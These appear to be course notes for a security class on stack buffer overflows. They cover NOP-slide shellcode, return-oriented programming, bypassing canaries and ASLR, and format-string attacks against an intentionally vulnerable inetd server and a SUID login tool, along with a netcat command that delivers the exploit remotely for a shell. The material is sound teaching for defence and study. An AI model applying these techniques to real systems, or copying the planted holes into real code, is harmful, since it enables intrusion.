=================== Class 11: Exploit =================== Date: 13.05.2025 Additional materials ===================== .. a: - :ref:`08-assignment` -- This got lost somewhere in the repo! - :download:`exploit-x86_64.tar.bz2` Program stack ============= Every process has a stack, provided by the operating system. It is nothing more than a mapped, continuous segment of the process's address space and a set stack register (for the purpose of this scenario - SP). Local variables, return addresses of currently executing functions, and partial results of calculations are stored on the stack. The implementation of operations is trivial: - putting data onto the stack means writing to the memory pointed to by the SP register and modifying this register by the size of the written data - taking data from the stack means reading from under SP and modifying SP by the size of the data being taken The operating system maps a predetermined amount of memory for the stack for programs (around 2 pages), and allocates subsequent memory pages only when needed. i386 ---- For the purposes of this scenario, we will focus on x86 architectures: - SP points to the byte at the top of the stack - the stack grows downwards, meaning putting data onto the stack decreases SP - on Linux and BSD, the function caller should (in the classic case, more in [1]): - save the contents of registers other than BP, SI, DI, BX (if it will want to use them later) - put arguments onto the stack in reverse order of function declaration - jump to the body of the called function, putting the current location in the program code onto the stack (return address) - upon return of the called function - remove arguments from the stack (result is in AX) - the called function should: - save registers BP, SI, DI, BX if it intends to change them - optionally set the BP register to the content of SP (needed to obtain stack-traces, simplifies assembler code, but is not mandatory; in gcc, generating such code can be disabled with the ``-fomit-frame-pointer`` flag) - reserve space on the stack for local variables (by shifting SP) - execute its body - restore registers - put the result into AX - jump to the address from the top of the stack - the return address, the one placed by the caller x86_64 ------ In the x86_64 architecture, function calls look very similar, with the difference that the first 6 arguments are passed through registers RDI, RSI, RDX, RCX, R8, R9 (or XMM0-7 for floating-point types, respectively). If a function has more arguments, they are passed via the stack - just like in i386. Of course, all addresses are 8 bytes. Disadvantages and advantages of the stack ------------------------------------------ As can be seen from this scenario, allocating local variables is very fast, because it boils down to modifying one register, and as long as local variables are multiples of the processor's word size, there is no fragmentation problem. These two features give stack allocation a significant advantage over heap allocation - malloc needs complex memory management logic and it is difficult to avoid fragmentation. Nevertheless, the stack is not suitable for holding variables whose lifespan exceeds a single function call. Another feature of the stack is the ease of predicting the arrangement of program data on it and, in the case of a poorly written program, using this knowledge to take control of the program. Buffer overflow =============== This term refers to a situation where, for some reason, the program "forgets" the actual size of a buffer and exceeds its boundaries, accessing memory that does not belong to it. Example:: char c[5]; strcpy(c, "12345"); ``strcpy()`` copies a string to the buffer passed as the first argument, along with the terminating null byte, so in this case, 6 characters into a 5-element buffer. The language specification usually says nothing about this, but compilers behave predictably, and it is easy to guess how variables are arranged relative to each other on the stack (usually sequentially). Such a situation causes a particular case of buffer overflow - stack buffer overflow, to be easily exploitable, because by exceeding the buffer boundary sufficiently, one can overwrite the return address from the function. If done skillfully, one can take control of the program, because the ret mnemonic in the attacked program's code will cause a jump to the location written in the return address. inetd ----- ``inetd`` is a standard Unix daemon, a so-called superserver. In the ``inetd.conf`` configuration file, programs are assigned to various network services, e.g., proftpd to the ftp service. ``inetd`` listens on the appropriate ports and upon establishing a connection, it starts the program appropriate for the service with descriptors 0 and 1 set so that the program sends data over the network by writing to standard output and reads data by reading from standard input. This approach used to be much more popular than it is today, although this daemon is still common. A newer version of the daemon is called ``xinetd`` and differs mainly in the configuration method - instead of one common ``inetd.conf`` file, each service has a separate file in the ``xinetd.d`` directory. Writing an exploit ------------------- Exploit - colloquial name for a program that exploits a vulnerability in another program. If we are able to track down a situation that allows arbitrary exceeding of a buffer size, we can overwrite the return address in such a way that the program does what the attacker wants. For simplicity, let's assume we are dealing with the following code (``server.c``):: int test() { char buf[128]; if (scanf("%s", buf) == EOF) return 0; printf(buf); return 1; } int main() { while (test()) { fflush(stdout); } return 0; } We assume that this code is run via inetd. Our goal will be to obtain everything that the user in whose name this program runs can obtain. A sketch of what we will write: - we will send code to be executed (the so-called payload) - in addition to the payload, we will send such data that instead of returning from the ``test()`` function, the payload is executed Problems: - check how much garbage needs to be inserted before the fake return address in the malicious message to hit the right spot on the stack - find out what to overwrite the return address with to jump to the payload - write a payload that does something sensible Finding out where the return address is, having the source code, is easy - just count, keeping in mind how function calls look on x86. When there is no code, this can be done by dumping memory (the stack) and from the end of the stack (it is known, because the SP register is known) look for 4/8-byte aligned numbers that point to the memory area where the program code is mapped. A bigger problem is finding out where to jump, because: - the stack address is assigned by the operating system - at first glance, it is not clear what is on the stack below the ``main`` function - even if, by reading the libc and kernel code, we find out what and how much is on the stack below the main function, it will turn out that it is not a constant number, because it depends, for example, on: - the size of arguments passed to the program - the environment Fortunately, a large part of systems always have the stack start address the same - close to the end of the process's virtual space, so the fluctuations in the position of this buffer cannot be very large - they depend mainly on the environment and program arguments. Hence, the fluctuations in the buffer address can be reasonably estimated - just run the program with an empty environment in the / directory, without arguments, and check the address of any local variable. It is almost certain that the stack below the main function will not be larger. We thus have one limitation, and as the second, a reasonable limitation on the environment and arguments should be accepted. For simplicity, for now, we ignore the fact that in most systems, the stack address is currently random (within a certain range). If we thus create such a situation on the stack: =============================== ==================== Before attack After attack =============================== ==================== ? payload ------------------------------- -------------------- ? NOP ------------------------------- -------------------- ? NOP ------------------------------- -------------------- ? NOP ------------------------------- -------------------- ? NOP ------------------------------- -------------------- ? NOP ------------------------------- -------------------- ? NOP ------------------------------- -------------------- ? NOP ------------------------------- -------------------- ? NOP ------------------------------- -------------------- ? NOP ------------------------------- -------------------- ? NOP ------------------------------- -------------------- return address malicious return address ------------------------------- -------------------- optionally saved registers garbage ------------------------------- -------------------- buffer garbage =============================== ==================== (NOP corresponds to some operation that does nothing) it is enough for the malicious return address to point to any NOP instruction. If there are enough of them, we can thus eliminate the fluctuations in the buffer address. This technique, which involves inserting a large number of NOPs into the buffer, is called a nop-slide, because figuratively speaking, we slide down the NOPs to the payload. Technical details ----------------- Tools: - ``objdump``: program disassembling compiled programs - will be useful for analysis, especially with the ``-d`` flag - ``ulimit``: program managing user limits - only to ask the kernel to make memory dumps (core dump) in case the program crashes - useful in debugging (``-c`` flag) - ``gdb``: debugging with the ability to load a memory dump - ``gcc``: for compiling programs, including the payload - ``/proc/self/maps``: this file in Linux shows process memory mappings, which allows to see where the stack starts - ``netcat`` (``nc``): program that will be used to send the exploit over the network Step-by-step implementation --------------------------- The simplest and most effective payload will be launching a shell, i.e., executing ``execve``. Since the launched program inherits descriptors, and the program launched in inetd uses descriptors 0, 1, and 2 for network communication, calling ``execve`` will achieve an effect similar to a remote shell. Since it is not clear where the PLT is located (because it depends on the compiler and very minor code changes) and even less clear where the libc library code is mapped, it is better to call syscalls manually - bypassing the wrappers provided by the standard library. Details were discussed in the second class. Knowing how to execute a syscall, one should write a program in assembler that will execute ``execve`` on ``/bin/sh``. An example is in the ``payload.s`` file. The executable code of this program will be our payload. Using make show-payload, you can see this code in a format suitable for saving in C. The ``demo.c`` file shows how to directly transfer control to this code (``brute_force`` function) and how to overwrite the return address with the payload address. The address used there is solely a result of calculating what is on the stack according to the calling convention given at the beginning. At this stage, we assume that the payload will be placed in executable memory. In the following part, we will discuss how to bypass this limitation. The last thing is to deliver the payload to the program from outside, along with the malicious return address and the NOP-slide. The address location in the buffer is a direct result of the demo.c example. The address itself, however, was experimentally verified by checking the address of a local variable in the ``main()`` function. This can be seen in the ``exploit.py`` file. After sending the malicious data, we need to be able to send commands somehow; this can be done as follows:: (./exploit.py; cat) | ./server Network attack --------------- To achieve the same effect over the network (inetd), you need to experiment a bit with the buffer size (the size of the NOP-slide) and the address to jump to. Then it is enough to use netcat (nc command) to interact with the remotely running server, which will later be a shell. To do this, run:: nc -c "./exploit.py;socat STDIO OPEN:/dev/tty" server_address port If everything goes well, the result will be exploiting the vulnerability of a 20-line program to take control of a remote computer. Non-executable stack (NX) ------------------------- One of the mechanisms that is supposed to make these types of attacks more difficult is marking which memory pages cannot be executed (NX flag). In particular, the stack normally does not contain program code, so it can be marked as such. However, this does not prevent the attack, it only makes it a little more difficult - we cannot jump directly to the sent payload, but we can use everything that is already loaded in memory and marked as executable - in particular, the standard library (directly or via PLT). On the i386 architecture, one can simply prepare a jump to e.g., the ``system()`` function from libc at the return address location and place arguments a bit further. Here, the address of the string ``/bin/sh`` or another equally useful string is needed. Since the exact stack address is not known, one cannot (directly) provide this string oneself. But a moment of searching will show that the necessary string is in the standard library:: $ xxd /lib64/libc.so.6|grep -A 1 /bin 01841a0: 6974 7900 6e61 6e00 2d63 002f 6269 6e2f ity.nan.-c./bin/ 01841b0: 7368 0065 7869 7420 3000 4d53 4756 4552 sh.exit 0.MSGVER In the case of the x86_64 architecture, it is a bit more complicated because initial parameters are passed through registers. But again, using what is already executable in memory, one can search for instruction sets that load data from the stack into registers. This technique is known as Return Oriented Programming, because the searched instruction sets (so-called gadgets) will most often be in the form of:: pop ... ret In this way, by placing gadget addresses and data alternately on the stack, we can load the desired data. Sometimes gadgets can be more complex, but to find the simplest ones, we can prepare a source file with the sought instructions (``gadgets.s``), compile it, and then search the process memory using the ``searchmem`` function from the peda extension to GDB:: $ objdump -d gadgets.o (...) 0000000000000000
: 0: 5f pop %rdi 1: c3 retq 2: 5e pop %rsi 3: c3 retq gdb-peda$ searchmem "\x5f\xc3" Searching for '_\xc3' in: None ranges Found 543 results, display max 256 items: server : 0x4007a3 (<__libc_csu_init+99>: pop rdi) server : 0x6007a3 --> 0x841f0f2e6666c35f libc : 0x7ffff7a3edd5 (: pop rdi) libc : 0x7ffff7a3ee02 (: pop rdi) (...) gdb-peda$ searchmem "/bin/sh" Searching for '/bin/sh' in: None ranges Found 1 results, display max 1 items: libc : 0x7ffff7ba21ab --> 0x68732f6e69622f ('/bin/sh') An example using this technique is in the ``exploit-rop.py`` file. Stack protector and address space randomization (ASLR) ----------------------------------------------------------- GCC has the ``-fstack-protector`` option, which causes gcc, when starting the execution of each function, to place a "canary" on the stack, which is a predetermined number that is checked before exiting the function to see if it has been changed. However, if there is a bug in the program that allows a memory segment containing the "canary" to leak, this mechanism becomes useless. It so happens that the test program ``server.c`` contains such a bug - having control over the format string for ``printf()``, any memory segment can be printed. An example is in ``exploit-rop-stack-protector.py``. Another mechanism that makes attacks more difficult is address space randomization (ASLR). Here, in turn, it makes it harder to know the addresses to which one could conveniently jump. And again, the existence of a bug allowing a memory segment to be read is enough to bypass this mechanism - having any address from the process's address space, one can check what should be there and calculate the remaining addresses based on that. An example is in ``exploit-rop-stack-protector-aslr.py``. Format string ============= Not only buffer overflow is a dangerous vulnerability. As seen earlier, giving control over the format string for ``printf()`` greatly facilitates attacks. But such a vulnerability in itself can be used to take control of the program. Firstly, sensitive data (e.g., passwords) may be present in memory, and secondly, the ``%n`` format allows modifying memory. Exploiting this is made easier by the fact that field width can additionally be taken from printf parameters (e.g., ``%*d``), and that the parameter number to be used can be specified (e.g., ``%4$d``, or ``%*5$d`` - combinations are also possible: ``%4$*5$d``). As a result, a primitive for copying data on the stack can be assembled from this: - read data by printing a field of appropriate width: ``%*15$d`` - then the number thus "read" can be written using ``%23$n`` If only interesting addresses are on the stack (or can be assembled using the above), memory can be modified arbitrarily in practice. An example program for experiments is in ``login.c``. It is a simple tool that checks a hardcoded password hash and, if it matches, launches a shell. It is intended to be installed with the SUID bit set. Additionally, to be more user-friendly, you can provide your own password prompt text. The goal of the attack is, of course, to bypass the password. To do this, one must find the address of the variable responsible for admitting the user on the stack, and then provide such a parameter as to overwrite this variable. Moral ===== The above examples show how dangerous careless programming is. Although this is an example for the purpose of a course, the mechanism is common, used, and ubiquitous. Security reports from internet portals such as Secunia confirm this. Can we defend against this in any way? There are many methods; unfortunately, they only make the work of hackers more difficult but do not prevent it: - stack randomization (the start of the stack is in a different place in each process) - randomization of the entire address space - including the mapping location of libraries and the program loading location - NX bit (newer processors allow marking a segment of the virtual space (stack) as Non-eXecutable, which will cause an error when trying to execute the payload) - gcc has the ``-fstack-protector`` option, which causes gcc, when starting the execution of each function, to place a "canary" on the stack, which is a predetermined number that is checked before exiting the function to see if it has been changed - gcc and glibc have protection against format string attacks, activated by the compilation option ``-D_FORTIFY_SOURCE=2`` - resolving all relocations early and switching the entire GOT and PLT to read-only A quite good way to avoid memory management errors (including buffer overflow) is to use languages that handle this themselves, such as Java, Python, etc. Of course, this will not protect against errors in the implementation of such a compiler/interpreter itself. Tips --------- - to disable stack randomization, change kernel settings:: sysctl -w kernel.randomize_va_space=0 - to add an ftp-like server on port 21 to inetd, add the line:: ftp stream tcp nowait root /root/server - for the ``xinetd`` version, analogous configuration will require ``/etc/xinetd.d/ftp``:: service ftp { disable = no id = ftp wait = yes socket_type = stream user = root group = root server = /root/server #server_args = } - when working with gdb, the "peda" extension (Python Exploit Development Assistance for GDB) is very useful - https://github.com/longld/peda - in the payload, be careful with whitespace - ``scanf()`` will stop reading the rest of the characters at the first such character .. Author: Marek Dopiera Update 12.05.2015 Marek Marczykowski-Górecki Translated by Gemini: 13.05.2025